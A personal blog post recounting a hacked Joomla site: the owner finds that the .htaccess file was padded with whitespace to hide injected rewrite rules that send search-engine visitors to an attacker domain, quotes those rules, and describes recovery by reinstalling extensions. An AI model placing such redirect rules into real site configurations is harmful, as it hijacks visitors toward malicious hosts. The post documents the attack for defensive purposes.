Rinet IT had a problem where some images weren't being loaded for the drop down boxes on the front page. Using Firebug, an addon for Firefox (my favourite browser), the image link was OK but the image wasn't being displayed in a small box in Firebug like it normally does; very puzzling.
Next I used the Net option of Firebug to check the loading of the faulty images. Instead of getting "200 OK" I got a "301 Moved Permanently" error.
After some quick research on Google I discovered htaccess hacks. I had a look at my htaccess. At first it appeared OK, but there was lots of empty lines at the start. Scrolling over to the right revealed the malicious code as can be seen below.
The result is that the .htaccess file has been modified with:
RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|alaarchiv|infospace).(.*) RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-land|browseireland|finditireland|iesearch|ireland-ikz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*) RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]
... and after the legitimate code was ...
ErrorDocument 500 http://gdrivedownuntil. pro/creation?8
In addition the hackers set the htaccess permissions to 0444 removing the write priviledge for the file owner; just a small frustration. These guys are really annoying.
The destination sites were all dead but registered with legitimate looking owners as checked with the whois command.
The destinations changed everytime and included:
First I tried finding the faulty file, spending hours on it; but it was a waste of time.
A restore from an Akeebra backup didn't help either; the rogue file must have been backed up along with everything else.
In the end I followed the advice from the Joomla Security Page 7.
The database is left intact, however some extensions reinstalled better than others.
Extension/Plugin | Uninstall First? |
Action |
Akeebra Backup | No | Reinstalling over an existing one should be OK. I removed it first and the new installation does not see the older backups. They still exist in the folder. |
CK Forms | No | Removing this deleted the database tables for ckforms. Redoing the form is quite a pain.It would be worthwhile leaving it and try reinstalling over the top of the existing installation.For my recovery I had to copy the data from the /installation/sql SQL files to the new database using phpMyAdmin. |
JCE | Yes | As for CK forms, although redoing the setup does not take long. |
jQuery++ (from tusher.org) | Yes | Reinstall fresh. The codes in the articles are not removed on uninstall. |
FAQ Slider (0.9RC5.1) | Yes | Reinstall fresh. The codes in the articles were not affected. |
Thickbox+ v1.3.1 | Yes | Reinstall fresh. The codes in the articles were not affected. |
JCrawler | Yes | Not reinstalled yet. |
You must be logged in to post a comment.
[…] I have had problems with Joomla and WordPress sites being hacked in the past. Rather than search for the corrupt code it’s easier to redo the site with a fresh install. Read more… […]